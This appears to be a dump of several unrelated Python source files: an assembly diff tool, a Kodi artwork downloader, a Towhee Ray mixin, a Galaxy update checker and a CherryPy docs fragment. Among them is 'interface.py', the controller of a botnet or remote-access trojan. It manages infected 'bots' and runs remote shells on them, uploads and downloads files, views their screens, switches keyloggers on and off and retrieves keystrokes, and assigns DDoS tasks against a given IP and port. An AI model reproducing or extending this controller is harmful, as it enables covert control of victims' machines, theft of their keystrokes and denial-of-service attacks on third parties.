if ret != 0 and self.pending_update is not None:
# killed by program with the intent to refresh
output = self.pending_update
self.pending_update = None
proca, procb = self.run_less(output)
self.less_proc = procb
self.ready_queue.put(None)
else:
# terminated by user, or killed
self.watch_queue.put(None)
self.ready_queue.put(None)
break
def progress(self, msg: str) -> None:
# Write message to top-left corner
sys.stdout.write("\x1b7\x1b[1;1f{}\x1b8".format(msg + " "))
sys.stdout.flush()
def update(self, text: str, error: bool) -> None:
if not error and not self.emsg and text == self.mydump:
self.progress("Unchanged. ")
return
if not error:
self.mydump = text
self.emsg = None
else:
self.emsg = text
output, refresh_key = self.run_diff()
if refresh_key == self.last_refresh_key:
self.progress("Unchanged. ")
return
self.last_refresh_key = refresh_key
self.pending_update = output
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def terminate(self) -> None:
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def main() -> None:
args = parser.parse_args()
# Apply project-specific configuration.
settings: Dict[str, Any] = {}
diff_settings.apply(settings, args) # type: ignore
project = create_project_settings(settings)
try:
config = create_config(args, project)
except ValueError as e:
fail(str(e))
if config.algorithm == "levenshtein":
try:
import Levenshtein
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.show_source:
try:
import cxxfilt
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.threeway and not args.watch:
fail("Threeway diffing requires -w.")
if args.diff_elf_symbol:
make_target, basecmd, mycmd = dump_elf(
args.start, args.end, args.diff_elf_symbol, config, project
)
elif config.diff_obj:
make_target, basecmd, mycmd = dump_objfile(
args.start, args.end, config, project
)
else:
make_target, basecmd, mycmd = dump_binary(args.start, args.end, config, project)
map_build_target_fn = getattr(diff_settings, "map_build_target", None)
if map_build_target_fn:
make_target = map_build_target_fn(make_target=make_target)
if args.write_asm is not None:
mydump = run_objdump(mycmd, config, project)
with open(args.write_asm, "w") as f:
f.write(mydump)
print(f"Wrote assembly to {args.write_asm}.")
sys.exit(0)
if args.base_asm is not None:
with open(args.base_asm) as f:
basedump = f.read()
else:
basedump = run_objdump(basecmd, config, project)
mydump = run_objdump(mycmd, config, project)
display = Display(basedump, mydump, config)
if args.no_pager or args.format in ("html", "json"):
print(display.run_diff()[0])
elif not args.watch:
display.run_sync()
else:
if not args.make:
yn = input(
"Warning: watch-mode (-w) enabled without auto-make (-m). "
"You will have to run make manually. Ok? (Y/n) "
)
if yn.lower() == "n":
return
if args.make:
watch_sources = None
watch_sources_for_target_fn = getattr(
diff_settings, "watch_sources_for_target", None
)
if watch_sources_for_target_fn:
watch_sources = watch_sources_for_target_fn(make_target)
watch_sources = watch_sources or project.source_directories
if not watch_sources:
fail("Missing source_directories config, don't know what to watch.")
else:
watch_sources = [make_target]
q: "queue.Queue[Optional[float]]" = queue.Queue()
debounced_fs_watch(watch_sources, q, config, project)
display.run_async(q)
last_build = 0.0
try:
while True:
t = q.get()
if t is None:
break
if t < last_build:
continue
last_build = time.time()
if args.make:
display.progress("Building...")
ret = run_make_capture_output(make_target, project)
if ret.returncode != 0:
display.update(
ret.stderr.decode("utf-8-sig", "replace")
or ret.stdout.decode("utf-8-sig", "replace"),
error=True,
)
continue
mydump = run_objdump(mycmd, config, project)
display.update(mydump, error=False)
except KeyboardInterrupt:
display.terminate()
if __name__ == "__main__":
main()
|
filemanager.py | import os
import re
import threading
import urllib
try:
import urllib.parse as urlparse
except ImportError: # py2
import urlparse
import xbmc
import xbmcvfs
from contextlib import closing
from lib import cleaner
from lib.libs import mediainfo as info, mediatypes, pykodi, quickjson, utils
from lib.libs.addonsettings import settings
from lib.libs.pykodi import localize as L, log
from lib.libs.webhelper import Getter, GetterError
CANT_CONTACT_PROVIDER = 32034
HTTP_ERROR = 32035
CANT_WRITE_TO_FILE = 32037
REMOTE_CONTROL_REQUIRED = 32039
FILEERROR_LIMIT = 3
PROVIDERERROR_LIMIT = 3
TEMP_DIR = 'special://temp/recycledartwork/'
typemap = {'image/jpeg': 'jpg', 'image/png': 'png', 'image/gif': 'gif'}
# REVIEW: Deleting replaced artwork. If [movie base name]-fanart.jpg exists and AB is
# configured for fanart.jpg, downloading a new artwork will save to the short name but
# leave the long name, and the next scan will pick up the long name.
# ditto scanning 'logo.png' at first and saving new 'clearlogo.png', but clearlogo will be picked
# first by the next scan so that's not such a big deal.
class FileManager(object):
def __init__(self, debug=False, bigcache=False):
self.getter = Getter()
self.getter.session.headers['User-Agent'] = settings.useragent
self.size = 0
self.fileerror_count = 0
self.provider_errors = {}
self.debug = debug
self.alreadycached = None if not bigcache else []
self._build_imagecachebase()
def _build_imagecachebase(self):
result = pykodi.execute_jsonrpc({"jsonrpc": "2.0", "id": 1, "method": "Settings.GetSettings",
"params": {"filter": {"category": "control", "section": "services"}}})
port = 80
username = ''
password = ''
secure = False
server_enabled = True
if result.get('result', {}).get('settings'):
for setting in result['result']['settings']:
if setting['id'] == 'services.webserver' and not setting['value']:
server_enabled = False
break
if setting['id'] == 'services.webserverusername':
username = setting['value']
elif setting['id'] == 'services.webserverport':
port = setting['value']
elif setting['id'] == 'services.webserverpassword':
password = setting['value']
elif setting['id'] == 'services.webserverssl' and setting['value']:
secure = True
username = '{0}:{1}@'.format(username, password) if username and password else ''
else:
server_enabled = False
if server_enabled:
protocol = 'https' if secure else 'http'
self.imagecachebase = '{0}://{1}localhost:{2}/image/'.format(protocol, username, port)
else:
self.imagecachebase = None
log(L(REMOTE_CONTROL_REQUIRED), xbmc.LOGWARNING)
def downloadfor(self, mediaitem, allartwork=True):
if self.fileerror_count >= FILEERROR_LIMIT:
return False, ''
if not info.can_saveartwork(mediaitem):
return False, ''
to_download = get_downloadable_art(mediaitem, allartwork)
if not to_download:
return False, ''
services_hit = False
error = ''
localfiles = get_local_art(mediaitem, allartwork)
for arttype, url in to_download.items():
hostname = urlparse.urlparse(url).netloc
if self.provider_errors.get(hostname, 0) >= PROVIDERERROR_LIMIT:
continue
full_basefilepath = info.build_artwork_basepath(mediaitem, arttype)
if not full_basefilepath:
continue
if self.debug:
mediaitem.downloadedart[arttype] = full_basefilepath + '.ext'
continue
result, err = self.doget(url)
if err:
error = err
self.provider_errors[hostname] = self.provider_errors.get(hostname, 0) + 1
continue
if not result:
# 404 URL dead, wipe it so we can add another one later
mediaitem.downloadedart[arttype] = None
continue
self.size += int(result.headers.get('content-length', 0))
services_hit = True
ext = get_file_extension(result.headers.get('content-type'), url)
if not ext:
log("Can't determine extension for '{0}'\nfor image type '{1}'".format(url, arttype))
continue
full_basefilepath += '.' + ext
if xbmcvfs.exists(full_basefilepath):
if extrafanart_name_used(full_basefilepath, localfiles):
# REVIEW: can this happen in any other circumstance?
full_basefilepath = get_next_filename(full_basefilepath, localfiles)
localfiles.append(full_basefilepath)
if xbmcvfs.exists(full_basefilepath) and settings.recycle_removed:
recyclefile(full_basefilepath)
else:
folder = os.path.dirname(full_basefilepath)
if not xbmcvfs.exists(folder):
xbmcvfs.mkdirs(folder)
# For now this just downloads the whole thing in memory, then saves it to file.
# Maybe chunking it will be better when GIFs are handled
file_ = xbmcvfs.File(full_basefilepath, 'wb')
with closing(file_):
if not file_.write(result.content):
self.fileerror_count += 1
raise FileError(L(CANT_WRITE_TO_FILE).format(full_basefilepath))
self.fileerror_count = 0
mediaitem.downloadedart[arttype] = full_basefilepath
log("downloaded '{0}'\nto image file '{1}'".format(url, full_basefilepath))
return services_hit, error
def doget(self, url, **kwargs):
try:
result = self.getter(url, **kwargs)
if not result and url.startswith('http://'):
# Try https, the browser "that totally shows this image" probably is, even if no redirect
result, err = self.doget('https://' + url[7:])
if err or not result:
result = None
return result, None
except GetterError as ex:
message = L(CANT_CONTACT_PROVIDER) if ex.connection_error else L(HTTP_ERROR).format(ex.message)
return None, message
def remove_deselected_files(self, mediaitem, assignedart=False):
if self.debug:
return
for arttype, newimage in mediaitem.selectedart.iteritems():
if newimage is not None:
continue
if assignedart:
oldimage = mediaitem.art.get(arttype)
else:
oldimage = mediaitem.forcedart.get(arttype)
if not oldimage:
continue
old_url = oldimage['url'] if isinstance(oldimage, dict) else \
oldimage if isinstance(oldimage, basestring) else oldimage[0]['url']
if not old_url or old_url.startswith(pykodi.notimagefiles) \
or old_url in mediaitem.selectedart.values() or not xbmcvfs.exists(old_url):
continue
if settings.recycle_removed:
recyclefile(old_url)
xbmcvfs.delete(old_url)
def set_bigcache(self):
if self.alreadycached is None:
self.alreadycached = []
def cachefor(self, artmap, multiplethreads=False):
if not self.imagecachebase or self.debug:
return 0
urls = [url for url in artmap.values() if url and not url.startswith(('http', 'image'))]
if not urls:
return 0
if self.alreadycached is not None:
if not self.alreadycached:
self.alreadycached = [pykodi.unquoteimage(texture['url']) for texture in quickjson.get_textures()
if not pykodi.unquoteimage(texture['url']).startswith(('http', 'image'))]
alreadycached = self.alreadycached
else:
alreadycached = [pykodi.unquoteimage(texture['url']) for texture in quickjson.get_textures(urls)]
count = [0]
def worker(path):
try:
res, _ = self.doget(self.imagecachebase + urllib.quote(pykodi.quoteimage(path), ''), stream=True)
if res:
res.iter_content(chunk_size=1024)
res.close()
count[0] += 1
except GetterError:
pass
threads = []
for path in urls:
if path in alreadycached:
continue
if multiplethreads:
t = threading.Thread(target=worker, args=(path,))
threads.append(t)
t.start()
else:
worker(path)
for t in threads:
t.join()
return count[0]
def extrafanart_name_used(path, localfiles):
return utils.parent_dir(path) == 'extrafanart' and path in localfiles
def get_file_extension(contenttype, request_url, re_search=re.compile(r'\.\w*$')):
if contenttype in typemap:
return typemap[contenttype]
if re.search(re_search, request_url):
return request_url.rsplit('.', 1)[1]
def get_next_filename(full_basefilepath, localfiles):
nextname = full_basefilepath
char_int = 97
while nextname in localfiles:
name, ext = os.path.splitext(full_basefilepath)
nextname = name + chr(char_int) + ext
char_int += 1
return nextname
def get_downloadable_art(mediaitem, allartwork):
if allartwork:
downloadable = dict(mediaitem.art)
downloadable.update(mediaitem.selectedart)
else:
downloadable = dict(mediaitem.selectedart)
for arttype in list(downloadable):
if not downloadable[arttype] or not downloadable[arttype].startswith('http') or \
not mediatypes.downloadartwork(mediaitem.mediatype, arttype):
del downloadable[arttype]
return downloadable
def get_local_art(mediaitem, allartwork):
local = []
if allartwork:
arts = mediaitem.art if settings.clean_imageurls else \
cleaner.clean_artwork(mediaitem) # library URLs not cleaned, but can still help here
for url in arts.values():
if url and not url.startswith('http'):
local.append(url)
for url in mediaitem.selectedart.values():
if url and not url.startswith('http'):
local.append(url)
return local
def recyclefile(filename):
firstdir = utils.parent_dir(filename)
directory = TEMP_DIR
pathsep = utils.get_pathsep(directory)
if firstdir in ('extrafanart', 'extrathumbs'):
directory += utils.parent_dir(os.path.dirname(filename)) + pathsep
directory += firstdir
if not xbmcvfs.exists(directory):
xbmcvfs.mkdirs(directory)
recycled_filename = directory + pathsep + os.path.basename(filename)
if not xbmcvfs.copy(filename, recycled_filename):
raise FileError(L(CANT_WRITE_TO_FILE).format(recycled_filename))
class FileError(Exception):
def __init__(self, message, cause=None):
super(FileError, self).__init__()
self.cause = cause
self.message = message
|
interface.py | # Date: 06/07/2018
# Author: Pure-L0G1C
# Description: Interface for the master
from re import match
from lib import const
from hashlib import sha256
from time import time, sleep
from os import urandom, path
from threading import Thread
from datetime import datetime
from os import getcwd, path, remove
from . import ssh, sftp, sscreenshare
######## Screenshare ########
class ScreenShare:
screen_src = path.join(getcwd(), 'templates', 'screen.html')
def __init__(self, bot, update):
self.sscreenshare = sscreenshare.SScreenShare(
const.PRIVATE_IP,
const.FTP_PORT
)
self.bot_id = bot['bot_id']
self.shell = bot['shell']
self.update = update
@property
def is_alive(self):
return self.sscreenshare.is_alive
def start(self, code):
print('Starting screenshare ...')
self.shell.send(code=code, args=self.update)
Thread(target=self.sscreenshare.start, daemon=True).start()
def stop(self):
print('Stopping screenshare ...')
self.shell.send(code=16)
self.sscreenshare.stop()
if path.exists(ScreenShare.screen_src):
try:
remove(ScreenShare.screen_src)
except:
pass
def close(self):
self.stop()
######## FTP ########
class FTP(object):
def __init__(self, file, bot, download=True):
self.sftp = sftp.sFTP(
const.PRIVATE_IP, const.FTP_PORT, max_time=60, verbose=True)
self.bot_id = bot['bot_id']
self.shell = bot['shell']
self.download = download
self.is_alive = False
self.success = False
self.time = None
self.file = file
def send(self, code, file=None):
if not path.exists(file):
return
self.shell.send(code=code, args=file)
self.is_alive = True
self.sftp.send(file)
self.is_alive = False
self.time = self.sftp.time_elapsed
self.success = True if self.sftp.error_code != -1 else False
def recv(self, code, file=None):
self.shell.send(code=code, args=file)
self.is_alive = True
self.sftp.recv()
self.is_alive = False
self.time = self.sftp.time_elapsed
self.success = True if self.sftp.error_code != -1 else False
def close(self):
self.sftp.close()
self.is_alive = False
######## Tasks #########
class Task(object):
def __init__(self, task_id, task_args, task_info_obj):
self.id = task_id
self.args = task_args
self.task_info_obj = task_info_obj
def start(self, bots):
for bot in [bots[bot] for bot in bots]:
bot['shell'].send(10, (self.id, self.args))
def stop(self, bots):
for bot in [bots[bot] for bot in bots]:
bot['shell'].send(11)
class TaskDdos(object):
def __init__(self, target, threads):
self.target = target
self.threads = threads
self.time_assigned = time()
def info(self):
time_assigned = datetime.fromtimestamp(
self.time_assigned).strftime('%b %d, %Y at %I:%M %p')
a = 'Task name: Ddos Attack\nTime assigned: {}\n\n'.format(
time_assigned)
b = 'Target: {}\nThreads: {}'.format(self.target, self.threads)
return a + b
######## Interface ########
class Interface(object):
def __init__(self):
self.bots = {}
self.ssh = None
self.ftp = None
self.task = None
self.screenshare = None
self.sig = self.signature
def close(self):
if self.ftp:
self.ftp.close()
self.ftp = None
if self.ssh:
self.ssh.close()
self.ssh = None
if self.screenshare:
self.screenshare.close()
self.screenshare = None
self.disconnect_all()
def gen_bot_id(self, uuid):
bot_ids = [self.bots[bot]['bot_id'] for bot in self.bots]
while 1:
bot_id = sha256((sha256(urandom(64 * 32) + urandom(64 * 64)
).digest().hex() + uuid).encode()).digest().hex()
if not bot_id in bot_ids:
break
return bot_id
@property
def signature(self):
bots = b''
for bot in self.bots:
bot_id = self.bots[bot]['bot_id']
bot_id = bot_id[:8] + bot_id[-8:]
bots += bot_id.encode()
return sha256(bots).digest().hex()
def is_connected(self, uuid):
for bot in self.bots:
if self.bots[bot]['uuid'] == uuid:
return True
return False
def connect_client(self, sess_obj, conn_info, shell):
uuid = conn_info['args']['sys_info']['uuid']
if self.is_connected(uuid):
self.close_sess(sess_obj, shell)
else:
bot_id = self.gen_bot_id(uuid)
self.bots[sess_obj] = {'bot_id': bot_id, 'uuid': uuid,
'intel': conn_info['args'], 'shell': shell, 'session': sess_obj}
self.sig = self.signature
print(self.bots)
if self.task:
shell.send(10, (self.task.id, self.task.args))
def close_sess(self, sess_obj, shell_obj):
print('Closing session ...')
shell_obj.is_alive = False
shell_obj.send(code=7, args=None) # 7 - disconnect
sess_obj.close()
if sess_obj in self.bots:
del self.bots[sess_obj]
self.sig = self.signature
def disconnect_client(self, sess_obj):
print('Disconnecting client ...')
if sess_obj in self.bots:
self.bots[sess_obj]['shell'].is_alive = False
bot_id = self.bots[sess_obj]['bot_id']
if self.ftp:
if self.ftp.bot_id == bot_id:
self.ftp.close()
self.ftp = None
self.close_sess(sess_obj, self.bots[sess_obj]['shell'])
self.sig = self.signature
def disconnect_all(self):
for bot in [self.bots[bot] for bot in self.bots]:
bot['session'].close()
self.sig = self.signature
def get_bot(self, bot_id):
for bot in self.bots:
if self.bots[bot]['bot_id'] == bot_id:
return self.bots[bot]
def ssh_obj(self, bot_id):
bot = self.get_bot(bot_id)
if bot:
if self.ssh:
self.ssh.close()
self.ssh = ssh.SSH(const.PRIVATE_IP, const.SSH_PORT,
max_time=30, verbose=True)
sock_obj = self.ssh.start()
if sock_obj:
t = Thread(target=self.ssh.serve, args=[sock_obj])
t.daemon = True
t.start()
bot['session'].send(code=1)
return self.ssh
else:
self.ssh.close()
self.ssh = None
def ssh_exe(self, cmd):
return self.ssh.send(cmd)
def ftp_obj(self, bot_id, cmd_id, file, override):
bot = self.get_bot(bot_id)
if not bot:
return ''
if cmd_id == 3:
if not path.exists(file):
return 'Upload process failed; the file {} was not found'.format(file)
if self.ftp:
if all([self.ftp.is_alive, not override]):
return 'Already {} {} {} {}. Use --override option to override this process'.format('Downloading' if self.ftp.download else 'Uploading',
self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8])
self.ftp.close()
del self.ftp
if self.screenshare:
if self.screenshare.is_alive and not override:
return 'Viewing the screen of {}. Use --override option to override this process'.format(
self.screenshare.bot_id[:8]
)
self.screenshare.close()
del self.screenshare
self.screenshare = None
self.ftp = FTP(file, bot, download=False if cmd_id == 3 else True)
ftp_func = self.ftp.send if cmd_id == 3 else self.ftp.recv
Thread(target=ftp_func, args=[cmd_id, file], daemon=True).start()
return '{} process started successfully'.format('Download' if self.ftp.download else 'Upload')
def ftp_status(self):
if not self.ftp:
return 'No file transfer in progress'
if self.ftp.is_alive:
return '{} {} {} {}. Check back in 1 minute'.format('Downloading' if self.ftp.download else 'Uploading',
self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8])
else:
return 'Attempted to {} {} {} {}. The process {} a success. Time-elapsed: {}(sec)'.format('download' if self.ftp.download else 'upload',
self.ftp.file, 'from' if self.ftp.download else 'to',
self.ftp.bot_id[:8], 'was' if self.ftp.success else 'was not', self.ftp.time)
def write_screen_scr(self, update):
html = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<title>Screenshare</title>
</head>
<body>
<div id="container">
<img src="../static/img/screen.png" alt="" height="512" width="1024" id="img" />
</div>
<script>
window.onload = function() {{
var image = document.getElementById('img');
function updateImage() {{
image.src = image.src.split('?')[0] + '?' + new Date().getTime();
}}
setInterval(updateImage, {});
}};
window.onfocus = function() {{
location.reload();
}};
</script>
<style>
body {{
background: #191919;
}}
img {{
border-radius: 5px;
}}
#container {{
text-align: center;
padding-top: 8%;
}}
</style>
</body>
</html>
'''.format(update * 1000)
with open(ScreenShare.screen_src, 'wt') as f:
f.write(html)
def screenshare_obj(self, bot_id, cmd_id, update, override):
bot = self.get_bot(bot_id)
if not bot:
return ''
if self.ftp:
if self.ftp.is_alive and not override:
return 'Already {} {} {} {}. Use --override option to override this process'.format('Downloading' if self.ftp.download else 'Uploading',
self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8])
self.ftp.close()
del self.ftp
self.ftp = None
if self.screenshare:
if self.screenshare.is_alive and not override:
return 'Already viewing the screen of {}. Use --override option to override this process'.format(
self.screenshare.bot_id[:8]
)
self.screenshare.close()
self.screenshare.update = update
self.screenshare.shell = bot['shell']
self.screenshare.bot_id = bot['bot_id']
else:
self.screenshare = ScreenShare(bot, update)
self.screenshare.start(cmd_id)
self.write_screen_scr(update)
return 'Screenshare is being hosted at the URL: {}'.format(ScreenShare.screen_src)
def execute_cmd_by_id(self, bot_id, cmd_id, args):
override = True if '--override' in args else False
if not cmd_id.isdigit():
return 'Failed to send command'
cmd_id = int(cmd_id)
if override:
args.pop(args.index('--override'))
if cmd_id == 1:
return self.ftp_status()
if cmd_id == 15:
update = ''.join(args[0]).strip()
if not update:
return 'Please provide an update time in seconds'
try:
update = float(update)
except ValueError:
return 'Please provide an integer for update time'
return self.screenshare_obj(bot_id, cmd_id, update, override)
if cmd_id == 16:
if not self.screenshare:
return 'Screenshare is inactive'
if not self.screenshare.is_alive:
return 'Screenshare is inactive'
self.screenshare.stop()
return 'Stopped screenshare ...'
if cmd_id == 17:
if not self.screenshare:
return 'Screenshare is inactive'
if not self.screenshare.is_alive:
return 'Screenshare is inactive'
return 'Viewing the screen of {}\nUpdating every {} seconds\nURL: {}'.format(
self.screenshare.bot_id[:8], self.screenshare.update, ScreenShare.screen_src
)
elif any([cmd_id == 3, cmd_id == 4, cmd_id == 5]):
return self.ftp_obj(bot_id, cmd_id, ' '.join(args[0:]) if cmd_id != 5 else 'a screenshot', override)
else:
bot = self.get_bot(bot_id)
if bot:
bot['shell'].send(code=cmd_id, args=args)
if cmd_id == 12:
if not bot['shell'].keylogging:
bot['shell'].keylogging = True
else:
return 'Keylogger is already active'
if cmd_id == 13:
if bot['shell'].keylogging:
bot['shell'].keylogging = False
else:
return 'Keylogger is already inactive'
if all([cmd_id == 14, not bot['shell'].keylogging]):
return 'Keylogger is inactive'
return self.keystrokes(bot['shell']) if cmd_id == 14 else 'Command sent successfully'
return 'Failed to send command'
def keystrokes(self, bot_shell):
while all([bot_shell.is_alive, not bot_shell.keystrokes]):
pass
try:
if all([bot_shell.is_alive, bot_shell.keystrokes]):
keystrokes = bot_shell.keystrokes
bot_shell.keystrokes = None
return keystrokes if keystrokes != '-1' else ''
except:
pass
def start_task(self):
Thread(target=self.task.start, args=[self.bots], daemon=True).start()
def stop_task(self):
if self.task:
t = Thread(target=self.task.stop, args=[self.bots], daemon=True)
t.start()
t.join()
self.task = None
def execute_cmd_by_task_id(self, cmd_id, args):
if not cmd_id.isdigit():
return 'Failed to send command'
cmd_id = int(cmd_id)
if cmd_id == 0: # stop task
Thread(target=self.stop_task, daemon=True).start()
return 'Task terminated' if self.task else 'No task is set'
elif cmd_id == 1: # status
return self.get_task()
else:
resp = self.set_task(cmd_id, args)
if resp == True:
self.start_task()
return 'Task set successfully'
else:
return resp
def get_task(self):
return 'No task is set' if not self.task else self.task.task_info_obj.info()
def set_task(self, task_id, args):
if task_id == 2: # ddos
return self.set_ddos_task(args)
else:
return 'Failed to set task'
def set_ddos_task(self, args):
task_id = 1 # the the bot side
if not len(args) == 3:
return 'Invalid amount of arguments'
ip, port, threads = args
if not self.valid_ip(ip):
return 'Invalid IP address'
if not self.valid_port(port):
return 'Invalid port'
if not self.valid_thread(threads):
return 'Invalid thread'
task_info_obj = TaskDdos('{}:{}'.format(ip, port), threads)
self.task = Task(task_id, (ip, int(port), int(threads)), task_info_obj)
return True
def valid_thread(self, thread):
return True if thread.isdigit() else False
def valid_ip(self, ip):
return False if not match(r'^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$', ip) else True
def valid_port(self, port):
_port = str(port).strip()
if not len(_port):
return False
else:
# check if number
for item in _port:
if not item.isdigit():
return False
# check if number starts with a zero
if int(_port[0]) == 0:
return False
# check if number is larger than 65535
if int(_port) > 65535:
return False
return True
|
ray.py | from queue import Queue
import asyncio
import threading
import uuid
from towhee.hub.file_manager import FileManagerConfig
from towhee.utils.log import engine_log
from towhee.functional.option import Option, Empty, _Reason
from towhee.functional.mixins.parallel import EOS
def _map_task_ray(unary_op):
def map_wrapper(x):
try:
if isinstance(x, Option):
return x.map(unary_op)
else:
return unary_op(x)
except Exception as e: # pylint: disable=broad-except
engine_log.warning(f'{e}, please check {x} with op {unary_op}. Continue...') # pylint: disable=logging-fstring-interpolation
return Empty(_Reason(x, e))
return map_wrapper
class RayMixin:
"""
Mixin for parallel ray execution.
"""
def ray_start(self, address = None, local_packages: list = None, pip_packages: list = None, silence = True):
"""
Start the ray service. When using a remote cluster, all dependencies for custom functions
and operators defined locally will need to be sent to the ray cluster. If using ray locally,
within the runtime, avoid passing in any arguments.
Args:
address (str):
The address for the ray service being connected to. If using ray cluster
remotely with kubectl forwarded port, the most likely address will be "ray://localhost:10001".
local_packages (list[str]):
Whichever locally defined modules that are used within a custom function supplied to the pipeline,
whether it be in lambda functions, locally registered operators, or functions themselves.
pip_packages (list[str]):
Whichever pip installed modules that are used within a custom function supplied to the pipeline,
whether it be in lambda functions, locally registered operators, or functions themselves.
"""
import ray #pylint: disable=import-outside-toplevel
local_packages = [] if local_packages is None else local_packages
pip_packages = [] if pip_packages is None else pip_packages
if ('towhee' not in pip_packages and 'towhee' not in [str(x.__name__) for x in local_packages]) and (address is not None):
pip_packages.append('towhee')
runtime_env={'py_modules': local_packages, 'pip': pip_packages }
ray.init(address = address, runtime_env = runtime_env, ignore_reinit_error=True, log_to_driver = silence)
self._backend_started = True
return self
def ray_resolve(self, call_mapping, path, index, *arg, **kws):
import ray #pylint: disable=import-outside-toplevel
if self.get_backend_started() is None:
self.ray_start()
# TODO: call mapping solution
y = call_mapping #pylint: disable=unused-variable
@ray.remote
class OperatorActor:
"""Ray actor that runs hub operators."""
def __init__(self, path1, index1, uid, *arg1, **kws1):
from towhee import engine #pylint: disable=import-outside-toplevel
from towhee.engine.factory import _ops_call_back #pylint: disable=import-outside-toplevel
from pathlib import Path #pylint: disable=import-outside-toplevel
engine.DEFAULT_LOCAL_CACHE_ROOT = Path.home() / ('.towhee/ray_actor_cache_' + uid)
engine.LOCAL_PIPELINE_CACHE = engine.DEFAULT_LOCAL_CACHE_ROOT / 'pipelines'
engine.LOCAL_OPERATOR_CACHE = engine.DEFAULT_LOCAL_CACHE_ROOT / 'operators'
x = FileManagerConfig()
x.update_default_cache(engine.DEFAULT_LOCAL_CACHE_ROOT)
self.op = _ops_call_back(path1, index1, *arg1, **kws1)
def __call__(self, *arg1, **kwargs1):
return self.op(*arg1, **kwargs1)
def cleanup(self):
from shutil import rmtree #pylint: disable=import-outside-toplevel
from towhee import engine #pylint: disable=import-outside-toplevel
rmtree(engine.DEFAULT_LOCAL_CACHE_ROOT)
actors = [OperatorActor.remote(path, index, str(uuid.uuid4().hex[:12].upper()), *arg, **kws) for _ in range(self._num_worker)]
pool = ray.util.ActorPool(actors)
queue = Queue(self._num_worker)
def inner():
while True:
x = queue.get()
if isinstance(x, EOS):
break
else:
yield x
for x in actors:
x.cleanup.remote()
def worker():
for x in self:
while pool.has_free() is False:
if pool.has_next():
queue.put(pool.get_next())
pool.submit(lambda a, v: a.__call__.remote(v), x)
while pool.has_next():
queue.put(pool.get_next())
queue.put(EOS())
t = threading.Thread(target=worker)
t.start()
return self._factory(inner())
def _ray_pmap(self, unary_op, num_worker=None):
import ray #pylint: disable=import-outside-toplevel
if self.get_backend_started() is None:
self.ray_start()
if num_worker is not None:
pass
elif self.get_executor() is not None:
num_worker = self._num_worker
else:
num_worker = 2
# TODO: Dynamic queue size
if self.is_stream:
queue = Queue(num_worker)
else:
queue = Queue()
loop = asyncio.new_event_loop()
def inner():
while True:
x = queue.get()
if isinstance(x, EOS):
break
else:
yield x
@ray.remote
def remote_runner(val):
return _map_task_ray(unary_op)(val)
async def worker():
buff = []
for x in self:
if len(buff) == num_worker:
queue.put(await buff.pop(0))
buff.append(asyncio.wrap_future(remote_runner.remote(x).future()))
while len(buff) > 0:
queue.put(await buff.pop(0))
queue.put(EOS())
def worker_wrapper():
loop.run_until_complete(worker())
loop.close()
t = threading.Thread(target=worker_wrapper)
t.start()
return self._factory(inner())
|
update_manager.py | """
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import threading, urllib2, logging
from galaxy.util import string_as_bool
import galaxy.util.shed_util as shed_util
from galaxy.model.orm import and_
log = logging.getLogger( __name__ )
class UpdateManager( object ):
def __init__( self, app ):
self.app = app
self.sa_session = self.app.model.context.current
# Ideally only one Galaxy server process should be able to check for repository updates.
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread( target=self.__restarter )
self.restarter.start()
self.seconds_to_sleep = app.config.hours_between_check * 3600
def __restarter( self ):
log.info( 'Update manager restarter starting up...' )
while self.running:
flush_needed = False
for repository in self.sa_session.query( self.app.model.ToolShedRepository ) \
.filter( and_( self.app.model.ToolShedRepository.table.c.update_available == False,
self.app.model.ToolShedRepository.table.c.deleted == False ) ):
if self.check_for_update( repository ):
repository.update_available = True
self.sa_session.add( repository )
flush_needed = True
if flush_needed:
self.sa_session.flush()
self.sleeper.sleep( self.seconds_to_sleep )
log.info( 'Transfer job restarter shutting down...' )
def check_for_update( self, repository ):
tool_shed_url = suc.get_url_from_repository_tool_shed( self.app, repository )
url = '%s/repository/check_for_updates?name=%s&owner=%s&changeset_revision=%s&from_update_manager=True' % \
( tool_shed_url, repository.name, repository.owner, repository.changeset_revision )
try:
response = urllib2.urlopen( url )
text = response.read()
response.close()
except Exception, e:
# The required tool shed may be unavailable.
text = 'False'
return string_as_bool( text )
def shutdown( self ):
self.running = False
self.sleeper.wake()
class Sleeper( object ):
"""
Provides a 'sleep' method that sleeps for a number of seconds *unless*
the notify method is called (from a different thread).
"""
def __init__( self ):
self.condition = threading.Condition()
def sleep( self, seconds ):
self.condition.acquire()
self.condition.wait( seconds )
self.condition.release()
def wake( self ):
self.condition.acquire()
self.condition.notify()
self.condition.release()
|
servers.py | """
Starting in CherryPy 3.1, cherrypy.server is implemented as an
:ref:`Engine Plugin<plugins>`. It's an instance of
:class:`cherrypy._cpserver.Server`, which is a subclass of
:class:`cherrypy.process.servers.ServerAdapter`. The ``ServerAdapter`` class
is designed to control other servers, as well.
Multiple servers/ports
======================
If you need to start more than one HTTP server (to serve on multiple ports, or
protocols, etc.), you can manually register each one and then start them all
with engine.start::
s1 = ServerAdapter(cherrypy.engine, MyWSGIServer(host='0.0.0.0', port=80))
s2 = ServerAdapter(cherrypy.engine, another.HTTPServer(host='127.0.0.1', SSL=True))
s1.subscribe()
s2.subscribe()
cherrypy.engine.start()
.. index:: SCGI
FastCGI/SCGI
============
There are also Flup\ **F**\ CGIServer and Flup\ **S**\ CGIServer classes in
:mod:`cherrypy.process.servers`. To start an fcgi server, for example,
wrap an instance of it in a ServerAdapter::
addr = ('0.0.0.0', 4000)
f = servers.FlupFCGIServer(application=cherrypy.tree, bindAddress=addr)
s = servers.ServerAdapter(cherrypy.engine, httpserver=f, bind_addr=addr)
s.subscribe()
The :doc:`cherryd</deployguide/cherryd>` startup script will do the above for
you via its `-f` flag.
